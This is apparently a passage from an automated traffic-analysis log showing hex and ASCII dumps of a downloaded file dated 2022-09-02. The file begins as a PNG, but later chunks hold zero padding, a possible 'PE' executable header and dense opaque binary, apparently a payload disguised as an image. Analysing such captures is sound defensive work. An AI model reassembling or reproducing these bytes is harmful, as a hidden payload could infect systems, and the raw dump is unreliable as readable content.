                                                                                            2022-09-02 09:02:36 UTC559INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 10 00 00 00 5c 08 06 00 00 00 a6 e7 ea b6 00 00 17 18 49 44 41 54 78 01 ed 5d 0b 94 1c 55 99 be 3a d3 81 c0 2e 82 c2 2a 82 08 12 10 90 05 92 aa 9a 84 90 d8 5d b7 7b b2 41 e2 41 81 28 b8 bb 0a 08 8a 1b 5c 84 98 05 e5 31 9a ae 9a 09 89 c0 02 0a 41 40 36 e1 81 06 17 10 1f 90 cc 24 01 f4 08 28 c8 43 58 58 7c 10 1e 64 fa 11 92 49 55 75 1e 99 64 7a ef b7 e6 b8 a4 b7 67 e6 bf d5 75 bb aa 87 fb 9d 73 4f e7 31 d3 d3 67 ea d6 57 ff fd ff ef ff 7e 16 07 66 76 ad db 2b ed 54 4c ee 7a a7 71 d7 9f 63 bb c1 65 b6 eb 3b dc f1 7b c4 df e7 8b bf 5f 22 d6 b9 d9 ee 60 56 da f5 8f 4e 77 55 77 67 1a 1a 1a ef 4c a4 7b 36 1f cc 9d ca 79 dc 0d ee b2 5d ff cf e2 b5 2a b3 32 79 6f bb 78 7d 5e 7c ef cd dc f5 ff 29 dd e5 ed cb
                                                                                            Data Ascii: PNGIHDR\IDATx]U:.*]{AA(\1A@6$(CXX|dIUudzgusO1gW~fv+TLzqce;{_"`VNwUwgL{6y]*2yox}^|)
                                                                                            2022-09-02 09:02:36 UTC560INData Raw: 93 8f 58 9f 15 44 e2 69 f2 d0 d0 04 92 10 70 27 b8 54 3e 59 19 5c 6f dc 54 4d b1 18 90 ed de 78 78 26 1f fc b7 26 0f 0d 4d 20 09 c8 7b f0 bc b7 4d 2a 51 ea 04 df 40 a2 93 c5 08 b4 f9 c3 43 84 69 68 68 02 89 07 5d 5d d5 77 73 d7 7f 4c 92 3c e6 31 0d 0d 0d 4d 20 82 0c 3e 2f 79 6c b9 86 1e 79 68 68 8c 59 68 02 99 79 ed d0 6e dc f5 d6 48 94 69 57 21 d9 ca 34 34 34 34 81 70 27 38 47 82 3c d6 a1 8c ca 34 34 34 34 81 20 f7 21 d3 24 27 92 95 5f 60 80 86 86 86 26 10 f4 ba c8 68 3d 40 38 0c d0 d0 d0 d0 04 c2 f3 c1 9d 54 02 41 6f 0c 03 34 34 34 34 81 a0 23 96 da 69 9b 71 fd 27 74 d5 a5 75 a0 a1 09 a4 da c5 de 8d c5 54 01 e2 2b 6a f4 41 53 79 6a 54 d3 e9 f6 75 dc e8 28 66 cd 79 c5 ac 75 77 81 1b bf 2d 65 8d 42 c9 b6 2a 85 ac 35 84 57 fc 1d ff 2e fe ff ae a2 6d 7e bd
                                                                                            Data Ascii: XDip'T>Y\oTMxx&&M {M*Q@Cihh]]wsL<1M >/ylyhhYhynHiW!4444p'8G<4444 !$'_`&h=@8TAo4444#iq'tuT+jASyjTu(fyuw-eB*5W.m~
                                                                                            2022-09-02 09:02:36 UTC561INData Raw: 8d 33 a8 7b ee 95 74 7a 77 99 72 70 d1 ee 98 51 27 02 f1 bf 4f 22 90 7c 70 f7 98 3f c2 e4 fd 8b ea 32 76 6e f2 91 82 10 76 48 d4 d2 1f 1c 98 36 6d 1f 16 02 d0 7b 40 90 26 75 46 b5 cd 8f b2 11 b0 65 c5 b8 23 c5 f1 63 87 c4 51 e5 67 d5 5e f6 1e 16 02 43 0f b1 f7 8a 23 ce 72 99 ca cc 96 87 c6 1d 31 aa d5 c4 4e b1 23 71 fd 11 92 83 b0 09 5a 54 77 92 40 20 90 a4 4b 44 a3 cf 23 ca 0d 59 51 5c 48 8c 42 9e c5 91 aa 36 2c bc 92 96 44 f5 1e 1c f3 11 88 13 5c 3c cc 85 5c 2a 71 21 ef ad 1a 46 8a 35 80 ea ec a3 c6 15 b3 d6 4f 24 7e e6 6d 6c 04 88 68 62 89 c4 b1 e2 9e 46 fb 59 aa 4f b2 94 78 9f fb 24 a2 9d 11 f3 6b 19 c7 3b 55 86 3c a6 3b c1 fe ac 01 80 7c 32 6e f0 56 d3 09 a4 f6 98 91 b5 7c 62 14 fa 5f 88 56 1a e9 db c2 51 9b f2 b3 10 55 d7 3a b0 cf 25 26 51 5f 1e eb
                                                                                            Data Ascii: 3{tzwrpQ'O"|p?2vnvH6m{@&uFe#cQg^C#r1N#qZTw@ KD#YQ\HB6,D\<\*q!F5O$~mlhbFYOx$k;U<;|2nV|b_VQU:%&Q_
                                                                                            2022-09-02 09:02:36 UTC562INData Raw: b8 e9 1c ef 37 12 d2 e1 97 09 03 79 62 01 54 a5 e4 2e dc f9 fe df 0f 43 20 57 d0 ea f1 a6 9a 61 5b f2 2e 68 97 d5 10 c8 15 94 1b 77 fb ca d4 19 8a 75 20 67 12 d5 b0 f3 43 3e d0 be a7 f2 9e c0 10 aa 66 12 08 a1 91 92 6e 60 c5 cd fc 5b 33 cc 0f b1 66 01 73 6f 25 4d 78 1e 22 f4 c8 34 15 e9 05 95 03 a9 dd 94 10 d1 0d 7f e3 9a a7 13 2f d6 0f 98 42 60 68 10 d1 bf f2 33 ec 6d d8 de 97 3a 9d 56 3e 6d bb 45 71 19 f7 0e ca e7 c0 e7 dd c5 81 2c bf f9 10 e2 3e 7c 89 29 42 6e be 77 64 93 85 64 d8 77 3d 0d 3a f8 3f 02 43 21 9a cc 5d 01 30 40 4a 72 86 c6 d2 d9 cb aa 6d 2c 01 80 7a 51 90 da 6f c9 47 31 a7 72 f2 b0 12 e0 f4 e4 83 89 5d b8 eb c3 74 e1 52 65 c8 d4 b6 ee da 27 cd e6 d5 bb 1d 4c ac 7e bc 25 5a f8 95 7c 7e e4 57 44 72 d4 a3 7c 8e cd cb 77 3b a4 f6 e9 4f 95 17
                                                                                            Data Ascii: 7ybT.C Wa[.hwu gC>fn`[3fso%Mx"4/B`h3m:V>mEq,>|)Bnwddw=:?C!]0@Jrm,zQoG1r]tRe'L~%Z|~WDr|w;O
                                                                                            2022-09-02 09:02:36 UTC564INData Raw: 6a 9a 44 b0 7b 8b 65 a1 29 d0 ce 0f 1c ca 14 00 21 1c 21 ac 54 b4 8c 7b 1b a9 cd 03 d5 07 d8 1e 68 f5 8f 29 f2 78 00 43 a7 1a 6e 70 73 fd f9 ef 24 02 01 30 8f 05 89 d2 38 22 0f ba 6f 48 88 9a 39 66 ca 66 f2 c1 40 42 8e 2c 9b 60 85 a7 da 76 11 2e 64 45 6e 5d dd e4 0b b9 10 3f 37 42 93 9f ab 9b 4a 20 bd a9 ef 10 c6 66 92 81 41 52 2a a3 60 e4 5b 50 12 8e 9d 40 6a 12 ee c8 a7 35 71 cf fd be 90 35 3f c2 54 03 c2 2c 54 56 70 03 c7 73 5c 81 fd bf b7 04 19 75 d6 44 94 b2 1d 27 29 0e 2d 51 3e 5b 8b 11 13 4c 01 44 27 ee 49 22 09 da af 92 38 f0 fe 98 f4 af 46 4c 58 b1 60 2b a1 60 3f 55 60 54 04 55 75 92 08 04 78 79 e6 84 dd f0 30 41 45 44 2d 79 98 37 10 12 a6 d1 13 09 ca a5 b6 eb bd d6 ac 88 03 ea 43 94 7e 59 93 51 33 08 79 11 ca aa 51 db ce 95 b2 e6 95 aa 1b a5 44
                                                                                            Data Ascii: jD{e)!!T{h)xCnps$08"oH9ff@B,`v.dEn]?7BJ fAR*`[P@j5q5?T,TVps\uD')-Q>[LD'I"8FLX`+`?U`TUuxy0AED-y7C~YQ3yQD
                                                                                            2022-09-02 09:02:36 UTC565INData Raw: a3 47 e6 86 28 15 bb 46 e7 47 e6 45 e4 46 e7 09 a8 47 e6 62 05 f3 94 44 e5 47 e6 62 05 fb 9c 44 e5 47 e6 62 05 f9 9e 44 e5 47 e6 bb 3b 0a 0b c4 e4 47 e6 e9 00 00 00 00 00 00 00 50 15 45 00 4c 4d 04 05 80 de 5e 63 63 00 00 00 00 00 00 00 e0 e0 02 23 2a 0a 09 08 00 70 70 00 00 70 70 00 00 00 00 00 a4 b3 17 00 00 10 10 00 00 80 80 00 00 00 00 10 10 10 10 00 00 10 10 00 04 04 00 00 00 00 00 00 04 04 00 00 00 00 00 00 00 00 01 01 00 10 10 00 bf a0 1e 01 02 02 00 00 00 00 10 10 00 10 10 00 00 00 10 10 00 10 10 00 00 00 00 00 10 10 00 00 80 1a 9a 00 62 62 00 00 14 81 95 00 28 28 00 00 00 c0 c0 00 fc da 26 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 f0 00 a0 a7 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                            Data Ascii: G(FGEFGbDGbDGbDG;GPELM^cc#*ppppbb((&
                                                                                            2022-09-02 09:02:36 UTC566INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                            Data Ascii:
                                                                                            2022-09-02 09:02:36 UTC568INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                            Data Ascii:
                                                                                            2022-09-02 09:02:36 UTC569INData Raw: 24 52 60 e8 e0 f8 96 02 de d5 78 28 85 d5 78 34 64 76 8b 91 93 b6 3d 80 80 10 a8 9a 74 15 62 08 2c b1 18 ac 10 39 2c bd 14 ac 10 39 2c b5 1c ac 10 e6 f3 79 c5 b9 10 11 74 66 90 8e 71 c5 b9 10 11 69 60 9a 92 10 ef 28 74 db c1 b9 10 b1 d9 c1 b9 10 9b a6 29 84 80 10 78 d8 1c ac 10 40 af 2a ee f8 4a cd 60 30 1b 8b 0e 8b 01 00 f6 f3 79 c5 b9 10 11 74 66 90 8e 71 c5 b9 10 11 69 60 9a 92 10 ef 28 74 db c1 b9 10 9b 86 75 c1 b9 10 78 a4 60 ac 10 41 ae 2a 5e 53 5d 5e d4 8b d2 57 01 00 f6 f3 79 c5 b9 10 11 74 66 90 8e 71 c5 b9 10 11 69 60 9a 92 10 ef 28 74 db c1 b9 10 9b 9e 6d c1 b9 10 78 cc 08 ac 10 42 ad 2a 5e 63 6d 68 e2 8b a6 23 01 00 b8 f9 50 04 04 10 04 c5 6c ac 10 11 04 b9 10 ac 10 11 04 c1 68 ac 10 78 d4 10 ac 10 f8 b3 a5 01 00 7c 47 c0 81 45 cf 8b 72 f6 00
                                                                                            Data Ascii: $R`x(x4dv=tb,9,9,ytfqi`(t)x@*J`0ytfqi`(tux`A*^S]^Wytfqi`(tmxB*^cmh#Plhx|GEr
                                                                                            2022-09-02 09:02:36 UTC570INData Raw: ad 10 1f 81 7a 0a 01 00 00 f2 0d ad ad 10 29 04 41 cc b0 10 65 70 ed da 37 05 00 39 44 6d 65 0e 93 28 ce 0e 00 e8 68 86 06 00 e8 88 74 14 00 eb 81 e9 7b fa 77 2c b1 ad 43 06 00 68 7c 16 02 00 6a 6b e9 23 c0 0b 00 8b 7b cb cc ae 00 56 8b 2d 57 01 00 a9 a9 ca 39 ac a0 10 ef ca b9 3c b0 10 f8 47 aa 05 00 59 a6 2f 55 45 b4 63 40 01 be 9c 72 06 00 59 00 a6 ea 1d 88 80 10 93 cd 4a fb 76 8f ed f3 4e be 53 b1 0a 00 59 b0 84 93 01 00 7c 7b fb 76 72 50 bf 55 b5 08 00 59 6a f3 80 1f 01 05 92 0b ce 0c 6a 66 64 f8 02 92 10 f8 36 cb 15 00 8b 72 72 79 79 d6 55 3b f3 80 c9 cc a1 61 73 83 79 35 2c 15 ad ad 10 1f 8b 41 c5 00 00 83 e6 99 fc 3b cb 84 71 86 7d fc 77 5b 8f 89 a9 81 10 95 45 b4 7c 5f 01 05 ac 2f 59 cc a1 67 fe 99 e4 0f 8b 12 96 00 00 57 01 05 bb 26 33 02 00 76
                                                                                            Data Ascii: z)Aep79Dme(ht{w,Ch|jk#{V-W9<GY/UEc@rYJvNSY|{vrPUYjjfd6rryyU;asy5,A;q}w[E|_/YgW&3v
                                                                                            2022-09-02 09:02:36 UTC572INData Raw: 47 c8 cf 95 be 41 a9 00 00 8b 7b a6 be da 2c 1e 00 56 be a5 50 1d 00 56 be db 24 17 00 56 be df 2a 1d 00 56 be cf 3a 1d 00 56 be ff 0c 1b 00 56 be 9d 7a 0f 00 56 be 12 e0 1a 00 68 2d 5e 1b 10 f8 e2 0a 00 00 83 47 e0 87 ab a8 a0 10 4e 9d 95 a9 ca 25 b0 a0 10 9b be 09 bc 80 10 ef 29 53 45 b4 55 80 ad ac a0 10 93 7b 07 8b 63 47 af ca 25 b0 a0 10 ef 29 29 2f 55 45 b4 7c 83 0b 78 f9 01 00 eb f0 73 08 e1 81 10 ef ea 21 b4 80 10 95 45 b4 6e 72 38 d1 81 10 40 af ea 11 84 80 10 95 45 b4 7e f5 8b 50 2c f7 2f 59 cd 60 2c 83 cf 60 2c 56 9d a9 6a e8 7e 69 00 00 a6 9a 95 a9 ca 25 b0 a0 10 9b be 09 bc 80 10 ef 29 53 45 b4 55 80 ad ac a0 10 93 7b 07 8b 63 47 af ca 25 b0 a0 10 ef 29 29 2f 55 45 b4 7c 83 0b 7c fd 01 00 eb f0 73 08 e1 81 10 ef ea 21 b4 80 10 95 45 b4 6e 72
                                                                                            Data Ascii: GA{,VPV$V*V:VVzVh-^GN%)SEU{cG%))/UE|xs!Enr8@E~P,/Y`,`,Vj~i%)SEU{cG%))/UE||s!Enr
                                                                                            2022-09-02 09:02:36 UTC573INData Raw: 05 00 00 ca a5 20 b0 10 b3 2f 3c b0 10 f8 0c 1e 05 00 7c 47 d4 b3 33 20 b0 10 f8 d9 21 10 00 85 45 b4 11 0d 57 21 1e 10 ef ca b1 34 b0 10 f8 c7 d4 04 00 a6 a6 2f 53 7b 07 5c af ac a0 10 64 3c 20 7c 16 02 00 6a 6b e9 fc 15 01 00 8b 7b 75 73 af 00 2d 40 62 a9 ca 39 ac a0 10 ef ca b9 3c b0 10 f8 14 06 05 00 a6 a6 2f 55 45 b4 6f 71 6a 56 be 28 3b 04 00 a6 00 a6 ea 1d 88 80 10 93 cd 4a fb 76 8f 35 f3 80 ab ec ef 83 90 04 00 cc f3 9e 01 9c a9 66 64 70 8b 93 10 f8 d7 34 0b 00 8b fe 7d 8d 73 82 01 f6 be 95 11 b9 10 13 76 36 29 6e ec f9 00 11 00 59 da e6 99 fc 56 be 5d 97 22 00 59 d0 cc a1 61 45 b4 7d 5f 06 b8 39 f3 22 00 59 00 9e 82 b9 02 01 00 00 17 e3 0b 00 00 83 fe 99 e4 75 42 c8 8a 7d e3 e1 60 6e ec 17 f0 0f 00 59 9a 95 3c 6a ff ca 91 15 b1 10 ef ea 05 90 80
                                                                                            Data Ascii: /<|G3 !EW!4/S{\d< |jk{us-@b9</UEoqjV(;Jv5fdp4}sv6)nYV]"YaE}_9"YuB}`nY<j
                                                                                            2022-09-02 09:02:36 UTC574INData Raw: 0f b1 de 67 bd da c6 5d 43 60 f3 f9 7c 4d 5e df 8e 8c 79 79 de 59 cb c6 00 01 00 00 74 7d 82 d6 55 8b c6 4d 0c 8d 9a 9a cc b9 7c be 1c 57 65 23 f3 f9 7c b9 4f 91 2d 9b 54 86 cf cc b9 17 d7 c3 f8 82 57 a6 7c 82 8c 8e 8a 40 cb dc 59 86 94 11 b9 75 93 16 ae e7 21 2e 00 85 45 99 2d 67 ec f8 84 fe 71 0c 74 7e 81 c6 41 86 8c f9 ba 49 84 89 47 c2 5f 50 de 59 87 c6 5d 64 46 b1 fe 81 fc 75 dc 29 7b db 54 71 85 7b f2 7c ea 1a 57 a6 70 c2 84 bd ff 83 e6 99 fc 80 be 3e 0f 8b 6d e9 00 00 8a 8c 3a 1c 54 70 38 35 7c 73 40 ad 18 bd a5 08 63 be 3e 0f 8b 54 d0 00 00 83 fe 75 08 74 7d 82 ce 4d 8b c6 4d 0c 8d 99 ef fe 32 e8 98 70 fa 22 e9 44 07 c1 be 62 28 8d 79 be 1c 57 53 d0 37 c0 74 6a 9c fe 81 fc 74 78 81 cb 47 81 b8 1a 57 71 8f 7b 1b e6 3e f3 f3 e8 e2 7c b9 f3 9b 54 49
                                                                                            Data Ascii: g]C`|M^yyYt}UM|We#|O-TW|@Yu!.E-gqt~AIG_PY]dFu){Tq{|Wp>m:Tp85|s@c>Tut}MM2p"Db(yWS7tjtxGWq{>|TI
                                                                                            2022-09-02 09:02:36 UTC576INData Raw: 7b f1 8a 79 f3 ea 3d a8 80 10 f9 12 fb 00 00 83 78 fe 70 79 8f e3 68 08 33 f3 80 a9 03 ea 00 00 83 78 fa 0e 8b 5a de 00 00 8b c5 2e e9 c4 b5 73 c6 41 85 c7 2e eb c3 4c 87 7a f1 07 8a 3d b8 00 00 8b 86 b5 18 a0 10 9b b6 81 1c a0 10 9b 5a d2 fa c2 ec aa 59 4f a2 c5 87 f5 22 df e7 5d 31 08 8b b6 85 18 a0 10 9b 96 a1 1c a0 10 52 41 dc 5c 42 cd 37 e8 af 9e 69 d6 a1 77 8b 3d b3 8e 00 c0 4b f5 1a 11 7c ce 81 22 e7 83 00 00 eb b5 63 ad 90 00 c0 b5 7c ce 81 22 e5 81 00 00 eb a5 73 ac 91 00 c0 b5 7c ce 81 22 e0 84 00 00 eb d5 03 ae 93 00 c0 b5 7c ce 81 22 e1 85 00 00 eb c5 13 b0 8d 00 c0 b5 7c ce 81 22 e6 82 00 00 eb f5 23 b2 8f 00 c0 b5 7c ce 81 22 e2 86 00 00 eb e5 33 af 92 00 c0 b5 72 c0 81 22 ee 8a 00 00 ff 89 12 0e 62 f7 2c 8a d0 f7 1a 8f ec 84 e3 68 08 51 ae
                                                                                            Data Ascii: {y=xpyh3xZ.sA.Lz=ZYO"]1RA\B7iw=K|"c|"s|"|"|"#|"3r"b,hQ
                                                                                            2022-09-02 09:02:36 UTC577INData Raw: aa ea bd 28 80 10 4d 02 01 05 02 9a a9 69 eb dc 1f 2b 00 83 7b f9 58 2d 61 7f 69 eb cf 0c 2b 00 85 45 99 2c 6a 9c be 2d bd ad 10 11 74 63 7e 94 fc 00 00 e8 dc ca 01 00 97 97 ff 00 00 e8 c2 d4 01 00 a6 00 9a 95 01 64 c5 49 7f 74 b4 10 93 bf c9 71 25 a1 10 11 74 6b 93 89 f1 75 21 a1 10 99 b1 50 c8 af 0f 00 ff cf b3 44 df f0 42 ad 07 00 85 45 99 00 2d 78 4a c5 7d da 58 ae e1 f3 80 1f 01 9d 40 a7 d1 75 21 a1 10 10 33 f3 2b 1a a2 d8 96 6d f0 80 10 46 e8 3e 21 a1 10 47 dc b5 bb 7a 8b 67 90 fd 7a 05 75 79 5a a8 2c 84 bf 3e 39 10 00 7c a5 26 59 da 45 ce 89 7f 5e 02 a2 10 6c a0 62 3e 21 a1 10 4f d4 8d 83 45 b4 7d 8a fd 7a 05 74 76 53 af 2c 50 45 ce 89 7f 5e 02 a2 10 6c 9a b8 05 98 96 de 67 67 ce 4d f7 cb f1 45 21 a1 10 ef ea b9 2c 80 10 4d 9e a9 66 64 30 cb 93 10
                                                                                            Data Ascii: (Mi+{X-ai+E,j-tc~dItq%tku!PDBE-xJ}X@u!3+mF>!GzgzuyZ,>9|&YE^lb>!OE}ztvS,PE^lggME!,Mfd0
                                                                                            2022-09-02 09:02:36 UTC578INData Raw: 00 dc 45 b4 5f a0 cb 64 e5 29 f7 e8 27 53 63 e1 c6 82 b9 02 01 00 00 14 cb ab ce a9 67 8b 8b 8b 33 fa f4 38 05 00 c0 cf 9b 55 4a 4a 02 48 ee 8d 2f 82 b9 02 01 00 00 cc f3 28 68 76 09 00 3c a9 62 60 d0 2b 93 10 f8 c6 d8 09 00 17 50 5f 18 00 74 cb 38 fd 45 b4 62 95 e6 99 fc ff 2f 3b ec 34 f3 80 83 48 ee 8d 2f 82 b9 02 01 00 00 17 1d d3 26 00 e8 af b1 09 00 3c ab 36 68 36 10 f8 f8 f5 1a 00 a6 fa b7 a2 b6 10 d3 48 cf 60 20 a7 bb ae b6 10 b3 bf aa b6 10 b3 83 96 b6 10 b3 87 92 b6 10 d3 48 cf 60 20 8f 86 c9 64 a0 10 46 6f 69 54 70 64 9b 7a 9a 9d fa 0f 77 50 2c 8b 43 cc 37 fd b4 99 80 a2 c5 0f 4f 68 2c 56 65 fa b2 76 3c 69 54 70 76 31 f3 03 3c ca 15 96 b6 10 f8 f5 f8 1a 00 a6 9a a9 4a 48 b0 4b 93 10 f8 62 7f 0a 00 cc cc 76 f4 99 6d f4 a5 53 d6 55 8b 78 f0 74 33
                                                                                            Data Ascii: E_d)'Scg38UJJH/(hv<b`+P_t8Eb/;4H/&<6h6H` H` dFoiTpdzwP,C7Oh,Vev<iTpv1<JHKbvmSUxt3
                                                                                            2022-09-02 09:02:36 UTC580INData Raw: 45 b4 77 53 af 28 54 40 d3 5d 38 ad 53 0d 52 d4 00 00 05 b1 b4 00 00 50 af 28 88 01 03 06 98 95 dd ff 50 2c 8d 73 82 0b 2c 06 02 dc b6 65 d8 80 10 46 a9 28 5c 0d 36 b0 00 00 85 45 b4 77 53 af 28 5c 0d 3e b8 00 00 85 45 b4 77 53 af 28 5c 0d 32 b4 00 00 85 45 b4 77 53 af 28 5c 0d 46 c0 00 00 85 45 b4 77 53 af 28 bd 6c 8b d3 0e 0d dc fa 83 b8 e4 a4 10 64 7d 82 88 86 45 b4 77 53 af 28 54 f8 87 fc 74 7e 81 c8 47 81 45 b4 77 53 af 28 54 40 d3 5d 38 ad 53 0d 52 d4 00 00 05 b1 b4 00 00 50 af 28 88 02 06 d0 4d 98 9d 46 7a 8b 43 b2 45 b4 47 65 dd bb 0b cc 83 5c 7f de b1 d0 3f 29 01 00 7a 73 af 2d 6f 4d be ba ad 00 00 7c bd 3e 59 2c 7a 8e 7f b6 ec a4 10 64 73 51 be 90 85 02 00 a6 d2 4c 99 9d f0 f3 03 a9 66 64 70 8c 94 10 f8 c3 db 0f 00 17 5d 54 1e 00 74 7b 51 f5 ff
                                                                                            Data Ascii: EwS(T@]8SRP(P,s,eF(\6EwS(\>EwS(\2EwS(\FEwS(ld}EwS(Tt~GEwS(T@]8SRP(MFzCEGe\?)zs-oM|>Y,zdsQLfdp]Tt{Q
                                                                                            2022-09-02 09:02:36 UTC581INData Raw: f0 00 00 72 99 66 c8 ad b8 07 a8 ea a9 3c 80 10 95 45 cf 8b ad 28 01 00 68 69 00 01 00 8d ce 5f 4a 06 b8 80 73 1b 00 33 e1 90 c1 47 c8 35 6c bd 61 f2 7f 8d fa 7f 03 89 7e f8 00 00 80 fd 93 ee 0f 8b 4b cf 00 00 8d f8 9a 65 84 8a 4d c6 8b 46 c2 00 00 0f b9 f0 b9 f0 b9 7f 20 4f a6 00 00 68 69 00 01 00 8d ce 5f 4a 06 b8 c9 3a 1b 00 8b c6 a9 67 47 c8 67 a2 f9 b9 fc 95 6d 3c c1 d9 a9 10 99 fc 91 0f c1 a0 cc 47 85 44 b4 5c 27 b9 88 31 b9 76 2b f9 99 ce a5 6a 0a dc f5 a9 10 18 4c 7f 26 12 b9 f0 47 46 7c c3 8e 9c 61 f6 75 4e 00 c6 be 3e 75 a4 5a fe 91 1b ba a5 63 45 ce 8b fe 9d e4 8d fc 91 96 9b 62 4c 4e f2 7f c3 84 4b 09 01 00 00 e8 c7 d4 04 00 95 6c 8f ca 4f 81 ce 53 9d 04 ed cd a9 10 4a 3c ed ba 70 27 ef b9 71 01 00 0a 3f 86 78 78 1b 78 6b 04 00 16 0c 1b 01 00
                                                                                            Data Ascii: rf<E(hi_Js3G5la~KeMF Ohi_J:gGgm<GD\'1v+jL&GF|auN>uZcEbLNKlOSJ<p'q?xxxk
                                                                                            2022-09-02 09:02:36 UTC582INData Raw: bb 00 00 80 0b 41 19 38 66 c9 fc fc 4d 11 f3 c2 a9 fd 72 0f 75 65 9d c7 aa 5b bb 00 00 80 53 38 60 c6 45 01 50 5d 89 c7 aa 5a ba 00 00 80 53 39 67 09 3c 7c c4 00 00 09 19 9b ce b9 75 8f 8f cd 74 cc 77 ce b5 0f f7 07 8a 76 f3 00 00 a1 25 32 b6 10 95 45 cf 8b 5c d8 00 00 8b 86 91 25 b9 10 9b be a1 14 80 10 78 68 40 40 00 c1 20 ee 0c 4b 44 b7 bb 80 80 00 53 02 ae 29 5d 86 91 25 b9 10 b1 25 32 b6 10 aa ba 00 00 80 53 39 e3 59 58 a9 25 32 b6 10 9b cb 50 9b 86 91 25 b9 10 93 27 2c 4c c4 00 00 00 a1 25 32 b6 10 9b cb 50 ee b6 0b e2 25 32 b6 10 9b c3 58 90 f9 3a 43 75 7c 8a e3 64 fa 5f 25 32 b6 10 93 fb 70 f7 8a 10 36 39 6a ff 8f 7c f3 29 77 25 32 b6 10 ef 8f 60 7a 6a ff ca 91 15 b1 10 ef ea 05 90 80 10 9b 86 85 31 b9 10 b1 25 32 b6 10 7b a2 dd 9f 9e 99 35 b9 10
                                                                                            Data Ascii: A8fMrue[S8`EP]ZS9g<|utwv%2E\%xh@@ KDS)]%%2S9YX%2P%',L%2P%2X:Cu|d_%2p69j|)w%2`zj1%2{5
                                                                                            2022-09-02 09:02:36 UTC584INData Raw: f2 7d 8d c2 43 81 f2 7f 8d d0 5d 8f c0 4f 8d d0 51 83 c0 4f 3f 70 43 7d 22 dd c6 4a 02 8c c5 42 f1 3f 42 7d de a8 c4 4a 02 77 6f 9c fd 72 0f 75 7b 85 45 71 bf 00 00 80 53 3c 64 c6 45 01 30 b4 c9 d4 d4 cf 45 25 cb a0 fd 72 0f 75 65 9d c3 ae 5f bf 00 00 80 53 3c 64 c6 45 01 70 7d 89 09 14 54 c4 00 00 8d c3 ae 5a ba 00 00 80 53 39 e3 19 9b ce 55 99 8a 8a cd 5c e4 cf f3 80 1f 01 05 92 0a 96 de 67 6f 6f f8 b5 29 31 b9 10 9b c6 45 63 ab d4 17 06 89 35 b9 10 93 42 d6 94 62 11 79 c4 bd 31 38 fd 57 1a ca 7a d9 76 01 2a 76 88 4d 31 2c 3d 6d ce b5 07 14 e6 8e 42 21 63 49 35 cc c5 25 39 63 dc ad 73 86 99 2d b9 10 9b 52 32 fa 9a d8 57 8f b0 18 76 ad db dd f5 dc a2 7f 89 40 d7 2f e3 51 d4 55 7a 9a d3 e3 ad 0a f4 96 91 35 b9 10 fb fa 9a d8 57 8f b0 18 76 ad db dd f5 dc
                                                                                            Data Ascii: }C]OQO?pC}"JB?B}Jworu{EqS<dE0E%rue_S<dEp}TZS9U\goo)1Ec5Bby18Wzv*vM1,=mB!cI5%9cs-R2Wv@/QUz5Wv
                                                                                            2022-09-02 09:02:36 UTC585INData Raw: 55 2b fc c8 8b d4 af 00 00 38 c7 0c 0c 00 00 e9 ac ba 00 00 cc cc 74 fe 79 66 6e ec 45 4d 1f 00 a6 9a f8 e4 aa 78 86 ce 55 2b fc b3 72 c1 c7 0c 0c 00 00 8b 48 2b 2f 1c 24 00 3c a9 7a 78 d0 2c 94 10 f8 9d ae 24 00 74 d6 55 8d 5e ae 7b f1 8a 79 e4 ec fa 01 00 a6 b0 25 cd 01 00 8b fe 79 89 73 83 79 5f bb e0 d8 2f 00 a6 b0 5e b6 01 00 83 be 95 11 b9 10 13 0c 8a 16 92 01 00 33 cc 76 f4 99 67 7d 1e ef 88 0d 8b 01 00 6a 6e ec fc f5 1e 00 a6 d0 f4 81 af bb 51 4b 0d 00 a6 d0 cc a5 db fc c8 8b 1a 9e 00 00 3b 0e a5 29 b9 10 67 3e 1f 05 03 b8 7a 65 08 00 7c 47 c8 89 45 b4 71 8c d4 b9 0f de 63 be b7 a5 05 00 a6 d0 cc a1 df fc b3 53 ac c8 bf b4 73 fd b4 70 89 4d 96 03 ac 8a 91 0c 27 cd 02 00 53 bb 81 9b 0d 00 76 cc a5 b3 03 b8 62 78 0d 00 7c 47 dc 21 44 99 91 3d 73 cc
